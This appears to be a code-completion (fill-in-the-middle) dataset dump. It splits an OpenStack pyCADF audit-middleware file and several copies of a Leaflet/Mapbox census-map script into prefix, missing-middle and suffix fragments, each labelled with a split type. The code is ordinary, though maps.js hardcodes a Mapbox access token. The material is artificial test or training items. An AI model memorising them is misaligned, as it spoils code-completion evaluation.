reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict()
| _get_action | identifier_name |
api.py | # -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import ConfigParser
import os
from oslo.config import cfg
import urlparse
from pycadf import cadftaxonomy as taxonomy
from pycadf import cadftype
from pycadf import credential
from pycadf import endpoint
from pycadf import eventfactory as factory
from pycadf import host
from pycadf import identifier
from pycadf import reason
from pycadf import reporterstep
from pycadf import resource
from pycadf import tag
from pycadf import timestamp
CONF = cfg.CONF
opts = [
cfg.StrOpt('api_audit_map',
default='api_audit_map.conf',
help='File containing mapping for api paths and '
'service endpoints'),
]
CONF.register_opts(opts, group='audit')
class ClientResource(resource.Resource):
def __init__(self, project_id=None, **kwargs):
super(ClientResource, self).__init__(**kwargs)
if project_id is not None:
self.project_id = project_id
class KeystoneCredential(credential.Credential):
def __init__(self, identity_status=None, **kwargs):
super(KeystoneCredential, self).__init__(**kwargs)
if identity_status is not None:
self.identity_status = identity_status
class PycadfAuditApiConfigError(Exception):
"""Error raised when pyCADF fails to configure correctly."""
class OpenStackAuditApi(object):
_API_PATHS = []
_BODY_ACTIONS = {}
_SERVICE_ENDPOINTS = {}
def __init__(self):
self._configure_audit_map()
def _configure_audit_map(self):
"""Configure to recognize and map known api paths."""
cfg_file = CONF.audit.api_audit_map
if not os.path.exists(CONF.audit.api_audit_map):
cfg_file = cfg.CONF.find_file(CONF.audit.api_audit_map)
if cfg_file:
try:
audit_map = ConfigParser.SafeConfigParser()
audit_map.readfp(open(cfg_file))
try:
paths = audit_map.get('DEFAULT', 'api_paths')
self._API_PATHS = paths.lstrip().split('\n')
except ConfigParser.NoSectionError:
pass
try:
self._BODY_ACTIONS = dict(audit_map.items('body_actions'))
except ConfigParser.NoSectionError:
pass
try:
self._SERVICE_ENDPOINTS = \
dict(audit_map.items('service_endpoints'))
except ConfigParser.NoSectionError:
pass
except ConfigParser.ParsingError as err:
raise PycadfAuditApiConfigError(
'Error parsing audit map file: %s' % err)
def _get_action(self, req):
"""Take a given Request, parse url path to calculate action type.
Depending on req.method:
if POST: path ends with action, read the body and get action from map;
request ends with known path, assume is create action;
request ends with unknown path, assume is update action.
if GET: request ends with known path, assume is list action;
request ends with unknown path, assume is read action.
if PUT, assume update action.
if DELETE, assume delete action.
if HEAD, assume read action.
"""
path = urlparse.urlparse(req.url).path
path = path[:-1] if path.endswith('/') else path
method = req.method
if method == 'POST':
if path[path.rfind('/') + 1:] == 'action':
if req.json:
body_action = req.json.keys()[0]
action = self._BODY_ACTIONS.get(body_action,
taxonomy.ACTION_CREATE)
else:
action = taxonomy.ACTION_CREATE
elif path[path.rfind('/') + 1:] not in self._API_PATHS:
action = taxonomy.ACTION_UPDATE
else:
action = taxonomy.ACTION_CREATE
elif method == 'GET':
if path[path.rfind('/') + 1:] in self._API_PATHS:
action = taxonomy.ACTION_LIST
else:
action = taxonomy.ACTION_READ
elif method == 'PUT':
action = taxonomy.ACTION_UPDATE
elif method == 'DELETE':
action = taxonomy.ACTION_DELETE
elif method == 'HEAD':
action = taxonomy.ACTION_READ
else:
action = taxonomy.UNKNOWN
return action
def create_event(self, req, correlation_id):
action = self._get_action(req)
initiator_host = host.Host(address=req.client_addr,
agent=req.user_agent)
catalog = ast.literal_eval(req.environ['HTTP_X_SERVICE_CATALOG'])
for endp in catalog:
admin_urlparse = urlparse.urlparse(
endp['endpoints'][0]['adminURL'])
public_urlparse = urlparse.urlparse(
endp['endpoints'][0]['publicURL'])
req_url = urlparse.urlparse(req.host_url)
if (req_url.netloc == admin_urlparse.netloc
or req_url.netloc == public_urlparse.netloc):
service_type = self._SERVICE_ENDPOINTS.get(endp['type'],
taxonomy.UNKNOWN)
service_name = endp['name']
admin_end = endpoint.Endpoint(
name='admin',
url=endp['endpoints'][0]['adminURL'])
private_end = endpoint.Endpoint(
name='private',
url=endp['endpoints'][0]['internalURL'])
public_end = endpoint.Endpoint(
name='public',
url=endp['endpoints'][0]['publicURL'])
service_id = endp['endpoints'][0]['id']
break
else:
service_type = service_id = service_name = taxonomy.UNKNOWN
admin_end = private_end = public_end = None
initiator = ClientResource(
typeURI=taxonomy.ACCOUNT_USER,
id=str(req.environ['HTTP_X_USER_ID']),
name=req.environ['HTTP_X_USER_NAME'],
host=initiator_host,
credential=KeystoneCredential(
token=req.environ['HTTP_X_AUTH_TOKEN'],
identity_status=req.environ['HTTP_X_IDENTITY_STATUS']),
project_id=req.environ['HTTP_X_PROJECT_ID'])
target = resource.Resource(typeURI=service_type,
id=service_id,
name=service_name)
if admin_end:
target.add_address(admin_end)
if private_end:
target.add_address(private_end)
if public_end:
|
event = factory.EventFactory().new_event(
eventType=cadftype.EVENTTYPE_ACTIVITY,
outcome=taxonomy.OUTCOME_PENDING,
action=action,
initiator=initiator,
target=target,
observer='target')
event.add_tag(tag.generate_name_value_tag('correlation_id',
correlation_id))
return event
def append_audit_event(self, req):
"""Append a CADF event to req.environ['CADF_EVENT']
Also, stores model in request for future process and includes a
CADF correlation id.
"""
correlation_id = identifier.generate_uuid()
req.environ['CADF_EVENT_CORRELATION_ID'] = correlation_id
event = self.create_event(req, correlation_id)
setattr(req, 'cadf_model', event)
req.environ['CADF_EVENT'] = event.as_dict()
def mod_audit_event(self, req, response):
"""Modifies CADF event in request based on response.
If no event exists, a new event is created.
"""
if response:
if response.status_int >= 200 and response.status_int < 400:
result = taxonomy.OUTCOME_SUCCESS
else:
result = taxonomy.OUTCOME_FAILURE
else:
result = taxonomy.UNKNOWN
if hasattr(req, 'cadf_model'):
req.cadf_model.add_reporterstep(
reporterstep.Reporterstep(
role=cadftype.REPORTER_ROLE_MODIFIER,
reporter='target',
reporterTime=timestamp.get_utc_now()))
else:
self.append_audit_event(req)
req.cadf_model.outcome = result
if response:
req.cadf_model.reason = \
reason.Reason(reasonType='HTTP',
reasonCode=str(response.status_int))
req.environ['CADF_EVENT'] = req.cadf_model.as_dict()
| target.add_address(public_end) | conditional_block |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
}
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") {
feature.properties.margin = parseFloat(dataObject[margin]);
}
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function | () {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>');
var title = $('<span>');
title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | setOverlayLayers | identifier_name |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
}
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") {
feature.properties.margin = parseFloat(dataObject[margin]);
}
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function setOverlayLayers() {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>'); | title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | var title = $('<span>'); | random_line_split |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
}
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") |
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
